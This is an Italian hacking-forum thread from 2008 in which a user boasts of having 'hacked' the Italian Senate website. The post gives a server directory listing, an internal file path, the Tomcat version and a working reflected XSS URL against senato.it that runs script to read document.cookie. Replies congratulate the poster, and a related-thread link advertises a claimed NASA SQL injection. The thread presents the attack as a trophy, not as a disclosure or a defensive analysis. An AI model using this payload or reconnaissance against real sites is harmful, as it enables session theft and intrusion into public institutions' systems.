[Hacked] Senato.it LFI + XSS

Threaded Mode | Linear Mode

[Hacked] Senato.it LFI + XSS

Author Message

Langy
Administrator

Posts: 8.464
Group: Administrators
Joined: Sep 2007
Status: Offline
Reputation: 10

Post: #1

[Hacked] Senato.it LFI + XSS

Code:

Directory Listing For /

Filename     Size     Last Modified

   attsen/           Mon, 03 Nov 2008 15:09:48 GMT

   avanzata/           Mon, 03 Nov 2008 15:09:48 GMT

   commissioni/           Mon, 03 Nov 2008 15:09:48 GMT

   corpo-risultati.jsp     0.3 kb     Thu, 06 Dec 2007 15:44:16 GMT

   default-beans.jsp     0.4 kb     Tue, 08 Mar 2005 11:41:48 GMT

   destroySession.jsp     0.1 kb     Tue, 08 Mar 2005 11:41:48 GMT

   docnonleg/           Mon, 03 Nov 2008 15:09:48 GMT

   dossier/           Mon, 03 Nov 2008 15:09:48 GMT

   emend/           Mon, 03 Nov 2008 15:09:48 GMT

   fine-form.jsp     1.3 kb     Thu, 10 May 2007 14:25:30 GMT

   fine-risultati.jsp     2.2 kb     Tue, 03 Jun 2008 15:20:12 GMT

   fine.jsp     1.4 kb     Mon, 16 Jun 2008 10:50:42 GMT

   fontinorm/           Mon, 03 Nov 2008 15:09:48 GMT

   form.jsp     0.2 kb     Fri, 11 May 2007 07:57:18 GMT

   inizio-form.jsp     0.9 kb     Thu, 10 May 2007 14:20:22 GMT

   inizio-risultati.jsp     1.7 kb     Mon, 17 Dec 2007 15:21:16 GMT

   inizio.jsp     3.0 kb     Tue, 03 Jun 2008 14:31:16 GMT

   lavori/           Mon, 03 Nov 2008 15:09:48 GMT

   leggi/           Mon, 03 Nov 2008 15:09:48 GMT

   notiziario/           Mon, 03 Nov 2008 15:09:48 GMT

   notizie/           Mon, 03 Nov 2008 15:09:48 GMT

   notizparlam/           Mon, 03 Nov 2008 15:09:48 GMT

   paginazione.jsp     2.1 kb     Mon, 17 Dec 2007 15:37:50 GMT

   regolamento/           Mon, 03 Nov 2008 15:09:48 GMT

   sDDL/           Mon, 03 Nov 2008 15:09:48 GMT

   sDDLa/           Mon, 03 Nov 2008 15:09:48 GMT

   showresult.jsp     0.6 kb     Tue, 08 Mar 2005 11:41:48 GMT

   sindisp/           Mon, 03 Nov 2008 15:09:48 GMT

   struts-jsp-2.jsp     0.3 kb     Thu, 06 Dec 2007 14:17:30 GMT

   struts-jsp.jsp     0.3 kb     Thu, 06 Dec 2007 14:14:12 GMT

   testiDDL/           Mon, 03 Nov 2008 15:09:48 GMT

Apache Tomcat/4.1.29

Path:

Code:

/var/local/jboss/conf/senato/work/MainEngine/localhost/

XSS:

Code:

http://www.senato.it/ricerche/leggi/nuova.ricerca?searchID=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

SENATO HACKED

"There is no patch for human stupidity" - K. D. M.

This post was last modified: 17-11-2008 01:41 AM by Langy.

Browser e O.S.:

17-11-2008 01:22 AM

xados
Moderator

Posts: 69
Group: Moderators
Joined: Oct 2008
Status: Offline
Reputation: 1

Post: #2

RE: [Hacked] Senato.it LFI + XSS

mica male ;-)

Browser e O.S.:

17-11-2008 09:28 PM

edo1493
GB - Newbie

Posts: 9
Group: Registered
Joined: Dec 2008
Status: Offline
Reputation: 0

Post: #3

RE: [Hacked] Senato.it LFI + XSS

Mi ca male si...ma io non ciÃ² le palle........

Browser e O.S.:

16-01-2009 06:12 PM

« Next Oldest | Next Newest »

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	[SQLi] .N.A.S.A.gov Hacked By Me!	xados	2	1.454	14-07-2009 02:39 PM Last Post: HaCkEr1

View a Printable Version
Send this Thread to a Friend
Subscribe to this Thread | Add Thread to Favorites

Home Page | Contact Us | Lite (Archive) Mode | RSS

Make a donation for a new forum platform. Thanks!

Googlebig is for sale! If you want to buy contact us